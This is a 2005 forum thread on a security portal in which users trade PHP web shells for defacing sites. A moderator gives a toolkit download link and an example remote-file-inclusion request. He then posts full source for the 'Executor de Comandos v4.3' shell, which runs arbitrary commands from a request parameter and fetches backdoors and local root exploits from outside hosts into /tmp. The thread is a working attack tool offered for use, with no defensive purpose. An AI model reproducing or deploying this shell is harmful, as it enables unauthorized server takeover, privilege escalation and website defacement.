Waraxe IT Security Portal
Login or Register
August 21, 2026
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 371
Members: 0
Total: 371
Full disclosure
[0day-rubbish] VMS 6.48.809 Authenticated command injection to root RCE (8.8)
[0day-rubbish] ONE Reporter 13.1 Authenticated RCE / privilege escalation via CommandExecutor (8.8)
[0day-rubbish] Gemini 7.3.0 Authenticated SQL injection to xp_cmdshell RCE (8.8)
[0day-rubbish] RoboTask 11.0.5.1229 Unauthenticated REST API remote task execution (9.8)
[0day-rubbish] ActiveFax Server 10.70 Unauthenticated LPD Ghostscript %pipe% SYSTEM RCE (9.8)
[0day-rubbish] Tornado 2.11.3 Unauthenticated arbitrary file write to root RCE (storeTo=file: to cron) (9.8)
[0day-rubbish] Datalore On-Premises 2026.2.3 Unauthenticated RCE via InteractiveReport access-mapping flaw (9.8)
APPLE-SA-08-18-2026-1 Safari 26.6.1
Cudy WR3000: Hard-coded JWT Secret to Root Command Injection
Security advisory: Pre-authentication RCE (SQL injection) in XPressEntry 3.7.7454 (Telaeris Inc)
Security advisory: Authenticated RCE (SQL injection) in Scrutinizer 19.7.0 (Plixer)
Security advisory: Pre-authentication SYSTEM RCE (Zip-Slip plugin planting) in Output Messenger Server 2.0.x (>= 2.0.63) (Srimax Software (Output Technology))
Security advisory: Pre-authentication RCE (arbitrary file write) in RapidDeploy 5.2.2 (MidVision)
Security advisory: Authenticated RCE (second-order SQL injection) in Lansweeper 12.2.1.0 (web reports 12.2.1.6) (Lansweeper)
Security advisory: Authenticated RCE (command injection) in Kerio Connect 10.0.9 Patch 2 (build 10320) (GFI Software)
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Tools -> Shell in PHP >Deface toolkit pro 1.6
Post new topicReply to topic View previous topic :: View next topic
Shell in PHP >Deface toolkit pro 1.6
PostPosted: Tue Jan 18, 2005 3:57 pm Reply with quote
LINUX
Moderator
Moderator
Joined: May 24, 2004
Posts: 404
Location: Caiman




Very easy use only upload shell.php and exec commands xD


exellent for RFI (Remote file inclusion) for redirection shell ned rename shell.php to .txt .hac .lam .fuck or all .* not php

Example
Code:
script_vuln.php?var_vuln=http://www.mysite.com/shell.txt



Link

hxxp://tbc-labz.org/dwn/defacing_tool.zip (copy and paste and change xx for tt) xD Rolling Eyes
View user's profile Send private message Visit poster's website
PostPosted: Tue Jan 18, 2005 6:55 pm Reply with quote
g0df4th3r
Advanced user
Advanced user
Joined: Sep 22, 2004
Posts: 52
Location: LV




i didnt look your posted , i use allways this one.

http://live2crack.narod.ru/shell.txt

_________________
Hackers by LV
View user's profile Send private message Visit poster's website ICQ Number
PostPosted: Tue Jan 18, 2005 9:46 pm Reply with quote
SteX
Advanced user
Advanced user
Joined: May 18, 2004
Posts: 181
Location: Serbia




is there any english version of this file ?
ps: http://tbc-labz.org/index.php?hacking=Toolz FULL LIST

_________________

We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
-------------------------------------------------------
View user's profile Send private message
PostPosted: Wed Jan 19, 2005 6:07 am Reply with quote
LINUX
Moderator
Moderator
Joined: May 24, 2004
Posts: 404
Location: Caiman




not english version but is very easy use
View user's profile Send private message Visit poster's website
PostPosted: Wed Jan 19, 2005 6:09 am Reply with quote
LINUX
Moderator
Moderator
Joined: May 24, 2004
Posts: 404
Location: Caiman




g0df4th3r wrote:
i didnt look your posted , i use allways this one.

http://live2crack.narod.ru/shell.txt




short and good


view this men

Code:
<CENTER><DIV STYLE="font-family: verdana; font-size: 18px; font-weight: bold; color: #FF0000;">Infektion Group</DIV>
<BR><DIV STYLE="font-family: verdana; font-size: 16px; font-weight: bold; color: #FF0000;">Executor de Comandos v4.3</DIV>
<?php
closelog( );
$login = posix_getuid( );
$euid = posix_geteuid( );
$gid = posix_getgid( );
if ($chdir == "") $chdir = getcwd( );

?>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0">
<?php

$uname = posix_uname( );
while (list($info, $value) = each ($uname)) {

?>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 10px;"><?= $info ?>: <?= $value ?></DIV></TD>
</TR>
<?php
}
?>

<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 10px;">Usu?rio: uid(<?= $login ?>) euid(<?= $euid ?>) gid(<?= $gid ?>)</DIV></TD>
</TR>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 10px;">Diret?rio Atual: <?= $chdir ?></DIV></TD>
</TR>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 10px;">Permiss?o de Escrita: <? if(@is_writable($chdir)){ echo "Sim"; }else{ echo "N?o"; } ?></DIV></TD>
</TR>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 10px;">Servidor: <?= "$SERVER_SOFTWARE $SERVER_VERSION"; ?></DIV></TD>
</TR>
</TABLE>
<BR>
<?php
if ($cmd != "") {
?>

<DIV STYLE="font-family: verdana; font-size: 12px; font-weight: bold; color: #FF0000;">Comando</DIV>
<?php
if (isset($chdir)) @chdir($chdir);
ob_start( );
passthru("$cmd 2>&1");
$output = ob_get_contents();
ob_end_clean( );
?>
<TEXTAREA COLS="75" ROWS="8" STYLE="font-family: verdana; font-size: 10px;">
<?php
if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
?>
</TEXTAREA>
<BR>
<?php
}
?>

<?php

if ($bs == "1") {
$fp = @fopen("http://www.infektiongroup.hpg.com.br/xpl/bd/bshell",r);
$fp2 = @fopen("/tmp/bs","w");
fwrite($fp2, "");
$fp1 = @fopen("/tmp/bs","a+");
for (;;) {
$read = @fread($fp, 4096);
if (empty($read)) break;
$ok = fwrite($fp1, $read);

if (empty($ok)) {
echo "<DIV STYLE=\"font-family: verdana; font-size: 12px;\">[-] Erro</DIV>";
break;
}
}

if (!empty($ok)) {
echo "<DIV STYLE=\"font-family: verdana; font-size: 12px;\">[*] Arquivo Enviado</DIV>";
}
}

if ($brk == "1") {
$fp = @fopen("http://www.infektiongroup.hpg.com.br/xpl/local/brk",r);
$fp2 = @fopen("/tmp/brk","w");
fwrite($fp2, "");
$fp1 = @fopen("/tmp/brk","a+");
for (;;) {
$read = @fread($fp, 4096);
if (empty($read)) break;
$ok = fwrite($fp1, $read);

if (empty($ok)) {
echo "<DIV STYLE=\"font-family: verdana; font-size: 12px;\">[-] Erro</DIV>";
break;
}
}

if (!empty($ok)) {
echo "<DIV STYLE=\"font-family: verdana; font-size: 12px;\">[*] Arquivo Enviado</DIV>";
}
}

?>
</CENTER>
<pre><font face="Tahoma" size="2">
<?php

if ($dx != "") {
$fp = @fopen("$hostxpl",r);
$fp2 = @fopen("$storage","w");
fwrite($fp2, "");
$fp1 = @fopen("$storage","a+");
for (;;) {
$read = @fread($fp, 4096);
if (empty($read)) break;
$ok = fwrite($fp1, $read);

if (empty($ok)) {
echo "<DIV STYLE=\"font-family: verdana; font-size: 12px;\">[-] Erro</DIV>";
break;
}
}

if (!empty($ok)) {
echo "<DIV STYLE=\"font-family: verdana; font-size: 12px;\">[*] Arquivo Enviado</DIV>";
}
}

flush( );

?>
<?
if ($kmod == "1") {
$fp = @fopen("http://www.vrfhp.hpg.com.br/pow20/kmod",r);
$fp2 = @fopen("/tmp/kmod","w");
fwrite($fp2, "");
$fp1 = @fopen("/tmp/kmod","a+");
for (;;) {
$read = @fread($fp, 4096);
if (empty($read)) break;
$ok = fwrite($fp1, $read);

if (empty($ok)) {
echo "<DIV STYLE=\"font-family: verdana; font-size: 12px;\">[-] Erro</DIV>";
break;
}
}
if (!empty($ok)) {
echo "<DIV STYLE=\"font-family: verdana; font-size: 12px;\">[*] Arquivo Enviado</DIV>";
}
}
?>
<?
if ($mremap == "1") {
$fp = @fopen("http://www.infektiongroup.hpg.com.br/xpl/local/local4",r);
$fp2 = @fopen("/tmp/local4","w");
fwrite($fp2, "");
$fp1 = @fopen("/tmp/local4","a+");
for (;;) {
$read = @fread($fp, 4096);
if (empty($read)) break;
$ok = fwrite($fp1, $read);

if (empty($ok)) {
echo "<DIV STYLE=\"font-family: verdana; font-size: 12px;\">[-] Erro</DIV>";
break;
}
}
if (!empty($ok)) {
echo "<DIV STYLE=\"font-family: verdana; font-size: 12px;\">[*] Arquivo Enviado</DIV>";
}
}
?>
<?
if ($cgi == "1") {
$fp = @fopen("http://www.infektiongroup.hpg.com.br/xpl/bd/cgi",r);
$fp2 = @fopen("/tmp/cgi","w");
fwrite($fp2, "");
$fp1 = @fopen("/tmp/cgi","a+");
for (;;) {
$read = @fread($fp, 4096);
if (empty($read)) break;
$ok = fwrite($fp1, $read);

if (empty($ok)) {
echo "<DIV STYLE=\"font-family: verdana; font-size: 12px;\">[-] Erro</DIV>";
break;
}
}
if (!empty($ok)) {
echo "<DIV STYLE=\"font-family: verdana; font-size: 12px;\">[*] Arquivo Enviado</DIV>";
}
}
?>
<?
if ($mass == "1") {
$fp = @fopen("http://www.infektiongroup.hpg.com.br/xpl/local/mass.jpg",r);
$fp2 = @fopen("$d","w");
fwrite($fp2, "");
$fp1 = @fopen("$d","a+");
for (;;) {
$read = @fread($fp, 4096);
if (empty($read)) break;
$ok = fwrite($fp1, $read);
if (empty($ok)) {
echo "<DIV STYLE=\"font-family: verdana; font-size: 12px;\">[-] Erro</DIV>";
break;
}
}
if (!empty($ok)) {
echo "<DIV STYLE=\"font-family: verdana; font-size: 12px;\">[*] Arquivo Enviado</DIV>";
}
}
?>
</font></pre>


hehe xD
View user's profile Send private message Visit poster's website
PostPosted: Wed Jan 19, 2005 7:37 am Reply with quote
hebe
Advanced user
Advanced user
Joined: Sep 04, 2004
Posts: 59




so thanks
View user's profile Send private message
a
PostPosted: Wed Jan 19, 2005 2:29 pm Reply with quote
SteX
Advanced user
Advanced user
Joined: May 18, 2004
Posts: 181
Location: Serbia




It is Infektion Group - Executor de Comandos v4.3

_________________

We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
-------------------------------------------------------
View user's profile Send private message
PostPosted: Fri Mar 11, 2005 3:27 pm Reply with quote
Dora
Regular user
Regular user
Joined: Dec 21, 2004
Posts: 10




To linux :

Could you share me this php shell scipts again ?
I get a error :

Fatal error: Call to undefined function posix_getuid() in /DISK2/WWW/nhoveem.ws/www/shell.php on line 5
View user's profile Send private message
PostPosted: Fri Mar 11, 2005 4:45 pm Reply with quote
LINUX
Moderator
Moderator
Joined: May 24, 2004
Posts: 404
Location: Caiman




Dora wrote:
To linux :

Could you share me this php shell scipts again ?
I get a error :

Fatal error: Call to undefined function posix_getuid() in /DISK2/WWW/nhoveem.ws/www/shell.php on line 5



yes in 2 or 3 days i upload in my journal: complete shell bypass safemode and others 2 shells only wait Cool
View user's profile Send private message Visit poster's website
Shell in PHP >Deface toolkit pro 1.6
www.waraxe.us Forum Index -> Tools
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



PCWizardHub - Helping you fix, build, and optimize your PC life
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.038 Seconds